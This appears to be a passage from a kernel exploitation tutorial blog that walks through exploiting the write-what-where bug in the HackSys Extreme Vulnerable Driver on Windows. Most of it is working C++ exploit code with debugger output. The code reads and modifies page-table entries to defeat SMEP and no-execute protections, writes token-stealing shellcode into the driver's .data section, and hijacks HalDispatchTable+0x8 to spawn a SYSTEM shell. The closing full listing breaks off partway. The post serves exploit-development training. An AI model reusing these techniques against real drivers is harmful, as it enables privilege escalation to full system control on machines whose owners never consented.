Published on

Kernel Exploitation Primer 0x5 - Arbitrary Write (Write-What-Where)

In this post, I am going to discuss another popular vulnerability called Arbitrary Write or Write-What-Where. It was really an interesting topic. I've tried to document every techniques here. Let’s get started without further ado.

Table of Contents

Write-What-Where Vulnerability Analysis

HEVD has specific function for Arbitrary Write vulnerability (also called as Write-What-Where) which is ArbitraryWriteIoctlHandler, whose IOCTL code is 0x22200B.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

Basically, this vulnerability allows us to write arbitrary data (what) to an arbitrary memory location (where). So we have control over the data we need to write and also the location where we need to write, hence Write-What-Where vulnerability.

Let’s analyze ArbitraryWriteIoctlHandler in IDA and we can see it makes a call to TriggerArbitraryWrite function (1️⃣) and it also sends the user input (2️⃣) to the function call.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

Diving into the function, it mentions the pointer to the user input (RCX) as UserWriteWhatWhere (1️⃣) and later it stores the pointer to R14 register (2️⃣), now RCX and R14 holds the pointer to the user input.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

Moving on, there is a call to ProbeForRead() API (1️⃣) which is to check that a specified address actually resides in the user address space. This API takes 3 arguments where:

  • The first argument is the user-space address and we know RCX still holds the user input address.
  • The second argument is the length of the buffer which will be in RDX register, seeing the above instructions (2️⃣) there is lea edx, [rsi+10h] instruction and before that (3️⃣) RSI is XORed so it will be zero, by using lea instruction it will be EDX = 0 + 0x10 (this won’t work with mov instruction) and EDX will be 0x10, so basically the length is 0x10 bytes.
  • Final argument is the Aligment which basically is the beginning of the user-mode buffer and it will take from the first byte (4️⃣).

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

void ProbeForRead(
  [in] const volatile VOID *Address,
  [in] SIZE_T              Length,
  [in] ULONG               Alignment
);

Moving forward, after the ProbeForRead() API call, there were few more operations, we already know R14 register holds the pointer of the user-input and by de-referencing it copies the first 8 bytes to RBX register (1️⃣) and the second 8 bytes register to RDI register (2️⃣). So probably it’s a structure with 2 x 8 bytes value. Finally it also stores the pointer (R14) of the user input to R9 register as well (3️⃣).

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

Here comes the interesting part, at the end of this block, there were 2 major operation happens:

  • We know RBX holds the first 8 bytes (first member of the structure) of user input and it dereference that and copies that value to RAX register (1️⃣).
  • And RDI holds the second 8 bytes (second member of the structure) of user input and it copies the value in RAX register to the RDI address. Basically overwriting what’s in RDI address.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

RBX represents WHAT (the value to write), and RDI represents WHERE (the address to write to) in this arbitrary write scenario. This means that the value stored at the address specified by the second member of the user-provided structure (RDI) will be overwritten by the value stored in the first member of the user-provided structure (RBX).

Below is a quick POC which write whatever value stored in the pointer 0x4141414141414141 to 0x4242424242424242. Of course this will fail because the address are not valid, but you get the idea.

// whatwhere.cpp : This file contains the 'main' function. Program execution begins and ends there.
//

#include <Windows.h>
#include <stdio.h>
#include <psapi.h>

#define WRITE_WHAT_WHERE_IOCTL CTL_CODE(FILE_DEVICE_UNKNOWN, 0x802, METHOD_NEITHER, FILE_ANY_ACCESS)

typedef struct _WRITE_WHAT_WHERE {
    void* WHAT;
    void* WHERE;
} WRITE_WHAT_WHERE, * PWRITE_WHAT_WHERE;

int main()
{
    printf("[+] Opening handle to driver\n");
    HANDLE hDriver = CreateFileW(
        L"\\\\.\\HackSysExtremeVulnerableDriver", GENERIC_WRITE,
        FILE_SHARE_WRITE,
        nullptr,
        OPEN_EXISTING,
        0,
        nullptr);

    if (hDriver == INVALID_HANDLE_VALUE)
    {
        printf("[!] Failed to open handle: %d", GetLastError());
        return 1;
    }

    WRITE_WHAT_WHERE input;
    input.WHAT = (LPVOID)(0x4141414141414141);
    input.WHERE = (LPVOID)(0x4242424242424242);

    printf("[+] Calling TriggerArbitraryWrite....");

    NTSTATUS success = DeviceIoControl(
        hDriver,
        WRITE_WHAT_WHERE_IOCTL,
        &input,
        sizeof(input),
        nullptr,
        0,
        nullptr,
        nullptr);

    if (success) {
        printf("success\n");
    }
    else {
        printf("failed\n");
        return 1;
    }

    return 0;
}

Dynamic Analysis via WinDBG

Let’s discuss about WHAT we gonna write and WHERE we gonna write, well it’s obvious we want to write our shellcode but WHERE? We need to write somewhere in kernel-space, that need to be safe and also execute it without BSOD the machine, because it’s crucial when writing stuffs in the kernel such that we don’t overwrite any existing data that might be in use.

There is a popular way to exploit WRITE-WHAT-WHERE in Windows Kernel using HalDispatchTable. The Hardware Abstraction Layer (HAL) Dispatch Table is a table of function pointers. It serves as an interface for kernel-mode components (OS) to interact with different hardwares.

There is an undocumented Windows API function called NtQueryIntervalProfile(). Which internally calls KeQueryIntervalProfile().

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

Checking KeQueryIntervalProfile() API, we can see a pointer stored in nt!HalDispatchTable+0x8 is moved to RAX (1️⃣) but instead of a direct call to nt!HalDispatchTable+0x8 itself, there is another call to nt!guard_dispatch_icall (2️⃣) (more on this below)

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

As I said earlier, HalDispatchTable is a table of pointer and the second pointer is what we gonna overwrite to our shellcode and call NtQueryIntervalProfile() API to invoke it.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

However, we noticed there is no direct call to nt!HalDispatchTable+0x8 itself, we have to go through nt!guard_dispatch_icall which is a part of Kernel Control-Flow Guard (kCFG). So if we replace this pointer (nt!HalDispatchTable+0x8) with our shellcode pointer, nt!guard_dispatch_icall will block the shellcode call.

kCFG requires Virtualization-Based Security (VBS) and HVCI to be fully implemented, but HVCI is disabled in the current scenario. kCFG contains a bitmap that stores information about valid kernel function entry points. It is used by the kernel to verify whether an indirect function call or jump is legitimate before allowing execution.

Basically it determine if the value that is placed in the RAX (1️⃣ above image) is the same as what it was in the bitmap when it was created. Since HVCI is disabled, we should not worry about this, however kCFG also checks if the address is user-space or kernel-space, but it does not check this through PTE. So even if we flip the bit from “U” to “K” it does not matter, it will still block the call to our user-space shellcode.

Let’s summarize what we know till now, if we WRITE our shellcode address in nt!HalDispatchTable+0x8, we can invoke NtQueryIntervalProfile() API call to run our shellcode pointer which was placed in nt!HalDispatchTable+0x8. But kCFG will block the kernel-space trying to execute user-space address. Well anyways, let’s give this a try and see it practically.

Usually we place ROP gadgets to bypass SMEP & VBS by finding the PTE of the user-space shellcode and flips the “U” flag to “K” and then execute the shellcode. And in previous Type Confusion & UAF vulnerabilities we used stack pivot inorder to execute the ROP gadgets to bypass SMEP & VBS. In this scenario we have WRITE permission, but we can also use this as READ.

Yes, we can WRITE WHATever values in any WHEREever we want, so what if we read (WHAT) the PTE base address and write that to a user-space (WHERE). So that we can flip the “U” flag to “K” and overwrite it in the next step.

Method (1) - VBS & SMEP Bypass (Failed)

A quick recap, the MiGetPteAddress() call contains the PTE base address, which can be retrieved via MiGetPteAddress+0x13, so this is what we are trying to read now.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

Step 1: Read the PTE base address

  • Allocated 8 bytes of user-space called as PteBase using VirtualAlloc(), this is where the PTE base address will be written.
  • Configured the WRITE_WHAT_WHERE structure, WHAT is the MiGetPteAddress+0x13 address with the offset and NT base address (which is retrieved using EnumDeviceDrivers()).
  • Then we call DeviceIoControl() with the structure as input.
  • After the call, we read the value stored in PteBase which is the base address of PTE.
    LPVOID PteBase = VirtualAlloc(NULL, sizeof(LPVOID), (MEM_COMMIT | MEM_RESERVE), PAGE_READWRITE);
    printf("[+] MiGetPteAddress+0x13 Address: %p\n", PteBase);

    WRITE_WHAT_WHERE input;
    input.WHAT = (LPVOID)((uintptr_t)nt_addr + 0x0027f770 + 0x13); // MiGetPteAddress+0x13 
    input.WHERE = (LPVOID)(PteBase);

    printf("[+] Calling TriggerArbitraryWrite....");

    NTSTATUS success = DeviceIoControl(
        hDriver,
        WRITE_WHAT_WHERE_IOCTL,
        &input,
        sizeof(input),
        nullptr,
        0,
        nullptr,
        nullptr);

    if (success) {
        printf("success\n");
    }
    else {
        printf("failed\n");
        return 1;
    }

    LPVOID* basePTE = (LPVOID*)PteBase;
    printf("[+] Base of PTE: %p\n", *basePTE);
  • Placed a breakpoint on the call to TriggerArbitraryWrite function and checking the RCX we can see the 2 values we sent.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

Moving forward to the arbitrary write (1️⃣), first it copies the value stored in RBX (MiGetPteAddress+0x13) to RAX register. Stepping over this instruction, we can confirm that RAX register holds the PTE base address (2️⃣). Then it writes the value stored in RAX to RDI pointer (3️⃣) and we can confirm that RDI (PteBase) contains the PTE base address (4️⃣).

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

We can confirm this in the console as well, it printed the PTE base address. Now that Step 1 is over.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

Step 2: PTE of Shellcode address

  • Now that we got the PTE base address, we can allocate a region for our shellcode (lpMemory)
  • Do the calculation (MiGetPte() the same function as what we used in previous posts) to get the PTE address of our shellcode (actualPTE).
  • Then using TriggerArbitraryWrite we can read that address to get the value stored, which is the PFN and the flags of our shellcode address (pfnShellcode).
    LPVOID lpMemory = VirtualAlloc(NULL, sizeof(shellcode), (MEM_COMMIT | MEM_RESERVE), PAGE_EXECUTE_READWRITE);
    printf("[+] Shellcode address: %p\n", lpMemory);
    memcpy(lpMemory, shellcode, sizeof(shellcode));

    uintptr_t ShellcodePte = MiGetPte(lpMemory);
    printf("[+] PTE calculated shellcode address: %p\n", (void*)ShellcodePte);

    uintptr_t actualPTE = (uintptr_t)*basePTE + ShellcodePte;
    printf("[+] Actual PTE of shellcode address: %p\n", actualPTE);

    getchar();

    LPVOID pfnShellcode = VirtualAlloc(NULL, sizeof(LPVOID), (MEM_COMMIT | MEM_RESERVE), PAGE_READWRITE);
    printf("[+] Allocated region to read PFN of shellcode: %p\n", pfnShellcode);

    input.WHAT = (LPVOID)(actualPTE);
    input.WHERE = (LPVOID)(pfnShellcode);

    printf("[+] Calling TriggerArbitraryWrite (2)....");

    success = DeviceIoControl(
        hDriver,
        WRITE_WHAT_WHERE_IOCTL,
        &input,
        sizeof(input),
        nullptr,
        0,
        nullptr,
        nullptr);

    if (success) {
        printf("success\n");
    }
    else {
        printf("failed\n");
        return 1;
    }

    LPVOID* pfn = (LPVOID*)pfnShellcode;
    printf("[+] PFN of shellcode: %p\n", *pfn);

Executed the POC and got the shellcode address and the PTE of the shellcode address.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

Checked the Page table of the shellcode address and we can see the PTE address (0xFFFFA2816C3B3C80) is same as what we retrieved through our POC and note down the value inside it.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

Stepping over the getchar(), retrieved the PTE bits of shellcode address and comparing that with the above image, both are same.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

Step 3: Flipping “U/S” bit to “K” bit

  • Now that we got the PTE bits/flags, we can flip the “U/S” bit to “K” bit, by subtracting or xor by 0x4 (modifiedPFN).
  • Then by calling TriggerArbitraryWrite() with the address of the shellcode PTE as WHERE and the modified value as WHAT, we can flip the flag.
    uintptr_t modifiedPFN = (uintptr_t)*pfn - 0x4;
    printf("[+] Modified PFN of shellcode with \"K\" flag: %p\n", modifiedPFN);

    input.WHAT = (LPVOID)(&modifiedPFN);
    input.WHERE = (LPVOID)(actualPTE);

    printf("[+] Calling TriggerArbitraryWrite (3)....");

    success = DeviceIoControl(
        hDriver,
        WRITE_WHAT_WHERE_IOCTL,
        &input,
        sizeof(input),
        nullptr,
        0,
        nullptr,
        nullptr);

    if (success) {
        printf("success\n");
    }
    else {
        printf("failed\n");
        return 1;
    }

    getchar();

Executed the POC and we got success message, let check that in WinDBG.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

The value is modified and the flag is flipped to “K”.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

Step 4: Overwriting HalDispatchTable+0x8

  • Let’s overwrite HalDispatchTable+0x8 pointer with out shellcode using the same method.
  • I retrieved the offset of HalDispatchTable (0x00c00a60) and we already got the NT base address and by adding those we get the actual address, this is the location we gonna overwrite.
  • And the user-space shellcode (lpMemory) is what we gonna overwrite.
    input.WHAT = (LPVOID)(&lpMemory);
    input.WHERE = (LPVOID)((uintptr_t)nt_addr + 0x00c00a60 + 0x8); // nt!HalDispathTable + 0x8
    printf("[+] Overwriting HalDispatchTable+0x8 with: %p\n", lpMemory);
    printf("[+] Calling TriggerArbitraryWrite (4)....");

    success = DeviceIoControl(
        hDriver,
        WRITE_WHAT_WHERE_IOCTL,
        &input,
        sizeof(input),
        nullptr,
        0,
        nullptr,
        nullptr);

    if (success) {
        printf("success\n");
    }
    else {
        printf("failed\n");
        return 1;
    }

Placed a breakpoint on the call to TriggerArbitraryWrite, and checked the arguments to verify and we can see WHAT contains a pointer to our shellcode address and WHERE is the HalDispatchTable+0x8 address and the PTE address of the shellcode is already flipped to “K” flag.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

Continuing the execution, we got success from the driver.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

Checking the HalDispatchTable table, we can confirm the second pointer is overwritten by our shellcode address.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

Step 5: Execute NtQueryIntervalProfile()

  • Now that everything is in place, the final step is to call NtQueryIntervalProfile(), since it’s a NT call, we need to retrieve the address, used the classic method of GetProcAddress() and GetModuleHandle() to do that.
  • And finally invoked NtQueryIntervalProfile() call with appropriate arguments.
pNtQueryIntervalProfile NtQueryIntervalProfile = (pNtQueryIntervalProfile)GetProcAddress(
        GetModuleHandle(L"ntdll.dll"), "NtQueryIntervalProfile");

    if (!NtQueryIntervalProfile) {
        printf("[-] Unable to find ntdll!NtQueryIntervalProfile\n");
        return 1;
    }

    printf("[+] Found ntdll!NtQueryIntervalProfile\n");
    printf("[+] Calling nt!NtQueryIntervalProfile to execute nt!HalDispatchTable+0x8...\n");

    getchar();

    ULONG x = 0;
    NtQueryIntervalProfile(
        0x1337,
        &x
    );

Placed a breakpoint on the call to KeQueryIntervalProfile() because internally NtQueryIntervalProfile() calls that.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

Got hit on the nt!KeQueryIntervalProfile() call as expected (1️⃣) and started walking through the instructions. We can see the pointer in HalDispatchTable+0x8 is moved to RAX register (2️⃣). Checking the value in RAX register (3️⃣) we can confirm it is our user-space shellcode address. And moving on, it makes the call to nt!guard_dispatch_icall with our shellcode address (4️⃣).

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

Stepping into the nt!guard_dispatch_icall call, we can see there is a test instruction on the user-space address and based on that it makes the jump. It decide this based on sign flag (SF).

  • Typically user-space address is in the range of 0x0000000000000000 - 0x00007FFFFFFFFFFF, it always have the bit 63 as 0, so it set SF as 0.
  • Kernel-space address is in the range of 0xFFFF800000000000 - 0xFFFFFFFFFFFFFFFF, it’s bit 63 is 1, so the SF is set to 1.
  • Basically this test instruction checks if the SF is 0 or 1 and decide whether it’s a user-space address or kernel-space address. Since this is user-space address, we can see the SF is set to 0 and it took the jump.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

Since it’s discovered it’s a user-space address, it ended up in BSOD. This is why at the beginning I mentioned even if we change the “U/S” bit to “K” bit, nt!guard_dispatch_icall does not check that. So this concludes we need to find another way to execute our shellcode.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

Method (2) - Driver’s Code Cave

The second method will be writing our shellcode in kernel-space that does not disturb other kernel components. The most common way is finding the .data section of the driver itself and find if there is any space left at the end of the section, basically looking for code cave. From the driver’s header, we can see the virtual address of .data.

0: kd> !dh hevd

File Type: EXECUTABLE IMAGE
FILE HEADER VALUES
    8664 machine (X64)
       7 number of sections
5D1B4BB0 time date stamp Tue Jul  2 05:18:56 2019

       0 file pointer to symbol table
       0 number of symbols
      F0 size of optional header
      22 characteristics
            Executable
            App can handle >2gb addresses
            
[::]

SECTION HEADER #3
   .data name
   80018 virtual size
    3000 virtual address
     200 size of raw data
    1400 file pointer to raw data
       0 file pointer to relocation table
       0 file pointer to line numbers
       0 number of relocations
       0 number of line numbers
C8000040 flags
         Initialized Data
         Not Paged
         (no align specified)
         Read Write

The .data region is always Readable and Writeable but not Executable, also this region got enough space for the shellcode. It also has some data written at the beginning, so I just skipped some bytes (0x20), just to be sure we are not overwriting anything else. From the target address PTE we can see it does not have “E” flag, so we need to add that.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

Step 1: Finding HEVD base address

  • We are planning to write our shellcode in the .data section of the loaded HEVD driver, so we need to find the base address of it as well.
  • Modified the getbaseaddress() function which I was using till now, and it get’s the base address of all the drivers using EnumDeviceDrivers(). Using that address we can retrieve the driver name using GetDeviceDriverBaseNameW() and compare the driver name with the driver we are looking for, which is passed as an argument to this function call.
// whatwhere.cpp : This file contains the 'main' function. Program execution begins and ends there.
//

#include <Windows.h>
#include <stdio.h>

PVOID getbaseaddress(LPCWSTR name)
{
    BOOL status;
    LPVOID* pImageBase;
    DWORD ImageSize;
    WCHAR driverName[1024];
    LPVOID driverBase = nullptr;

    status = EnumDeviceDrivers(nullptr, 0, &ImageSize);

    pImageBase = (LPVOID*)VirtualAlloc(nullptr, ImageSize, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);

    status = EnumDeviceDrivers(pImageBase, ImageSize, &ImageSize);

    int driver_count = ImageSize / sizeof(pImageBase[0]);

    for (int i = 0; i < driver_count; i++) {
            GetDeviceDriverBaseNameW(pImageBase[i], driverName, sizeof(driverName) / sizeof(char));

            if (!wcscmp(name, driverName)) {
                driverBase = pImageBase[i];
                break;
            }
    }

    return driverBase;
}

int main()
{
    LPVOID nt_addr = getbaseaddress(L"ntoskrnl.exe");
    printf("[+] Nt base address: %p\n", nt_addr);
    LPVOID hevd_addr = getbaseaddress(L"HEVD.sys");
    printf("[+] HEVD base address: %p\n", hevd_addr);

    return 0;
}

It worked perfectly, we can retrieve the base address of NT and also HEVD driver.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

Step 2: Writing Shellcode to Kernel-space

  • Now that we got HEVD base address, we can locate the region where we gonna write our shellcode which is HEVD + 0x3000 + 0x20.
  • Since we can write only 8 bytes at a time, I made a for loop which sends 8 bytes (of shellcode) at a time to the kernel-space address (HEVD + 0x3000 + 0x20) by calling TriggerArbitraryWrite.
  • So shellcode_start is the kernel-space address where we gonna write the shellcode and also took a backup of that address as kernelShellcode.
// Step 2

LPVOID shellcode_start = (LPVOID)((uintptr_t)hevd_addr + 0x3000 + 0x20);
LPVOID kernelShellcode = (LPVOID)((uintptr_t)hevd_addr + 0x3000 + 0x20);
printf("[+] Address of Shellcode in kernel space: %p\n", shellcode_start);

BYTE shellcode[] = {
    0x65, 0x48, 0x8B, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00,
    0x48, 0x8B, 0x80, 0xB8, 0x00, 0x00, 0x00, 0x49, 0x89,
    0xC0, 0x4D, 0x8B, 0x80, 0x48, 0x04, 0x00, 0x00, 0x49,
    0x81, 0xE8, 0x48, 0x04, 0x00, 0x00, 0x4D, 0x8B, 0x88,
    0x40, 0x04, 0x00, 0x00, 0x49, 0x83, 0xF9, 0x04, 0x75,
    0xE5, 0x49, 0x8B, 0x88, 0xB8, 0x04, 0x00, 0x00, 0x80,
    0xE1, 0xF0, 0x48, 0x89, 0x88, 0xB8, 0x04, 0x00, 0x00,
    0x31, 0xC0, 0xC3, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff
};

size_t size = sizeof(shellcode);
size_t num_chunks = size / 8;

uint64_t* chunks = new uint64_t[num_chunks];

for (size_t i = 0; i < num_chunks; i++) {
    std::memcpy(&chunks[i], &shellcode[i * 8], 8);

    input.WHAT = (LPVOID)(&chunks[i]);
    input.WHERE = (LPVOID)(shellcode_start);

    printf("[+] Calling TriggerArbitraryWrite to Write Shellcode in 0x%p....", shellcode_start);

    success = DeviceIoControl(
        hDriver,
        WRITE_WHAT_WHERE_IOCTL,
        &input,
        sizeof(input),
        nullptr,
        0,
        nullptr,
        nullptr);

    if (success) {
        printf("success\n");
    }
    else {
        printf("failed\n");
        return 1;
    }

    shellcode_start = (LPVOID)((uintptr_t)shellcode_start + 0x8);

}
delete[] chunks;

Executed the POC, and we can see get the address of our shellcode in kernel, and it started writing our shellcode in that location.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

Checking that address after the execution, we can see our shellcode is written here.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

Step 3: PTE & PTE bits of the shellcode

  • This step is as same as what we did in “Method (1)”, we gonna read MiGetPteAddress+0x13 to get the base PTE address (basePTE). We are doing this because the region where we have written our shellcode is just RW and we need RWX.
  • Then calculate the PTE address of our shellcode address using MiGetPte() (which is the same as what I used previously) and store the actual PTE address of the shellcode in actualPTE.
  • Then using the actualPTE address, we read that and get the PTE bits, for the next operation (pfn).
LPVOID PteBase = VirtualAlloc(NULL, sizeof(LPVOID), (MEM_COMMIT | MEM_RESERVE), PAGE_READWRITE);
printf("[+] Allocated region to read MiGetPteAddress+0x13 Address: %p\n", PteBase);

input.WHAT = (LPVOID)((uintptr_t)nt_addr + 0x0027f770 + 0x13); // MiGetPteAddress+0x13
input.WHERE = (LPVOID)(PteBase);

printf("[+] Calling TriggerArbitraryWrite....");

success = DeviceIoControl(
    hDriver,
    WRITE_WHAT_WHERE_IOCTL,
    &input,
    sizeof(input),
    nullptr,
    0,
    nullptr,
    nullptr);

if (success) {
    printf("success\n");
}
else {
    printf("failed\n");
    return 1;
}

LPVOID* basePTE = (LPVOID*)PteBase;
printf("[+] Base address of PTE: %p\n", *basePTE);

uintptr_t ShellcodePte = MiGetPte(kernelShellcode);

uintptr_t actualPTE = (uintptr_t)*basePTE + ShellcodePte;
printf("[+] PTE of shellcode address: %p\n", actualPTE);

LPVOID pfnShellcode = VirtualAlloc(NULL, sizeof(LPVOID), (MEM_COMMIT | MEM_RESERVE), PAGE_READWRITE);
printf("[+] Allocated region to read PFN of shellcode: %p\n", pfnShellcode);

input.WHAT = (LPVOID)(actualPTE);
input.WHERE = (LPVOID)(pfnShellcode);

printf("[+] Calling TriggerArbitraryWrite....");

success = DeviceIoControl(
    hDriver,
    WRITE_WHAT_WHERE_IOCTL,
    &input,
    sizeof(input),
    nullptr,
    0,
    nullptr,
    nullptr);

if (success) {
    printf("success\n");
}
else {
    printf("failed\n");
    return 1;
}

LPVOID* pfn = (LPVOID*)pfnShellcode;
printf("[+] PFN of shellcode address: %p\n", *pfn);

Executing the POC, we get the PTE address of the shellcode and also read the value. Cross-verified with WinDBG as well.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

Step 4: Clear no-eXecute bit in PTE

  • Now that we got the PTE bits/flags, we need to clear the no-eXecute bit from that, which can be done easily by doing an AND operation with 0x0FFFFFFFFFFFFFFF, we get the value with “E” flag (modifiedPFN).
  • Then we call TriggerArbitraryWrite and write the modified value (modifiedPFN) to the PTE address (actualPTE) of the shellcode.
uintptr_t modifiedPFN = (uintptr_t)*pfn & 0x0FFFFFFFFFFFFFFF;
printf("[+] Modified PFN of shellcode with \"E\" flag: %p\n", modifiedPFN);

input.WHAT = (LPVOID)(&modifiedPFN);
input.WHERE = (LPVOID)(actualPTE);

printf("[+] Calling TriggerArbitraryWrite....");

success = DeviceIoControl(
    hDriver,
    WRITE_WHAT_WHERE_IOCTL,
    &input,
    sizeof(input),
    nullptr,
    0,
    nullptr,
    nullptr);

if (success) {
    printf("success\n");
}
else {
    printf("failed\n");
    return 1;
}

Now that the execution is success, and we can see “E” flag in our kernel-space shellcode address.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

Step 5: Overwritting HalDispatchTable+0x8

  • This step is also same as what we did in “Method (1)”, we gonna simply overwrite the pointer in HalDispatchTable+0x8 with our kernel-space shellcode address (kernelShellcode).
input.WHAT = (LPVOID)(&kernelShellcode);
input.WHERE = (LPVOID)((uintptr_t)nt_addr + 0x00c00a60 + 0x8);
printf("[+] Overwriting HalDispatchTable+0x8 with: %p\n", kernelShellcode);
printf("[+] Calling TriggerArbitraryWrite (4)....");

success = DeviceIoControl(
    hDriver,
    WRITE_WHAT_WHERE_IOCTL,
    &input,
    sizeof(input),
    nullptr,
    0,
    nullptr,
    nullptr);

if (success) {
    printf("success\n");
}
else {
    printf("failed\n");
    return 1;
}

The execution to overwrite HalDispatchTable+0x8 is success. Checking the HalDispatchTable, the second pointer is overwritten by our kernel shellcode address as well.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

Step 6: Triggering NtQueryIntervalProfile()

  • This is also the same step, we gonna execute NtQueryIntervalProfile() and trigger the call to HalDispatchTable+0x8.
pNtQueryIntervalProfile NtQueryIntervalProfile = (pNtQueryIntervalProfile)GetProcAddress(
    GetModuleHandle(L"ntdll.dll"), "NtQueryIntervalProfile");

if (!NtQueryIntervalProfile) {
    printf("[-] Unable to find ntdll!NtQueryIntervalProfile\n");
    return 1;
}

printf("[+] Found ntdll!NtQueryIntervalProfile\n");
printf("[+] Calling nt!NtQueryIntervalProfile to execute nt!HalDispatchTable+0x8...\n");

ULONG x = 0;
NtQueryIntervalProfile(
    0x1337,
    &x
);

printf("[+] Spawning a shell with elevated privileges\n\n");
system("cmd");

Placed some breakpoints on the API calls and executed the code, and got hit on NtQueryIntervalProfile, just continued that and got hit on the second breakpoint KeQueryIntervalProfile. Let’s walkthrough this call once again.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

The nt!HalDispatchTable+0x8 pointer is moved to RAX register (1️⃣) and we can also confirm that address is our kernel-space shellcode address (2️⃣). Moving on to the nt!guard_dispatch_icall (3️⃣), let’s step into this call.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

Now that we are stepped inside nt!guard_dispatch_icall call (1️⃣), it made the call to test rax, rax (2️⃣) to check the sign flag (SF) and after the call, we can confirm the SF is “1”. So it didn’t take the jump.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

Moving down the road, it makes an indirect jmp to RAX register value, which is our shellcode address.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

And it executed our shellcode, got shell as “SYSTEM”.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

  • Full POC:

    // whatwhere.cpp : This file contains the 'main' function. Program execution begins and ends there.
    //
    
    #include <Windows.h>
    #include <stdio.h>
    #include <psapi.h>
    #include <cstdint>
    #include <cstring>
    
    #define WRITE_WHAT_WHERE_IOCTL CTL_CODE(FILE_DEVICE_UNKNOWN, 0x802, METHOD_NEITHER, FILE_ANY_ACCESS)
    
    typedef struct _WRITE_WHAT_WHERE {
        void* WHAT;
        void* WHERE;
    } WRITE_WHAT_WHERE, * PWRITE_WHAT_WHERE;
    
    typedef NTSTATUS(WINAPI* pNtQueryIntervalProfile)(IN ULONG ProfileSource, OUT PULONG Interval);
    
    PVOID getbaseaddress(LPCWSTR name)
    {
        BOOL status;
        LPVOID* pImageBase;
        DWORD ImageSize;
        WCHAR driverName[1024];
        LPVOID driverBase = nullptr;
    
        status = EnumDeviceDrivers(nullptr, 0, &ImageSize);
    
        pImageBase = (LPVOID*)VirtualAlloc(nullptr, ImageSize, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
    
        status = EnumDeviceDrivers(pImageBase, ImageSize, &ImageSize);
    
        int driver_count = ImageSize / sizeof(pImageBase[0]);
    
        for (int i = 0; i < driver_count; i++) {
                GetDeviceDriverBaseNameW(pImageBase[i], driverName, sizeof(driverName) / sizeof(char));
    
                if (!wcscmp(name, driverName)) {
                    driverBase = pImageBase[i];
                    break;
                }
        }
    
        return driverBase;
    }
    
    uintptr_t MiGetPte(LPVOID lpMemory) {
        uintptr_t addr = reinterpret_cast<uintptr_t>(lpMemory);
    
        uintptr_t calc1 = addr >> 9; // shr rcx, 9 
        uintptr_t calc2 = calc1 & 0x7FFFFFFFF8; // and rax, rcx
    
        return calc2;
    }
    
    int main()
    {
        WRITE_WHAT_WHERE input;
        NTSTATUS success;
    
        printf("[+] Opening handle to driver\n");
        HANDLE hDriver = CreateFileW(
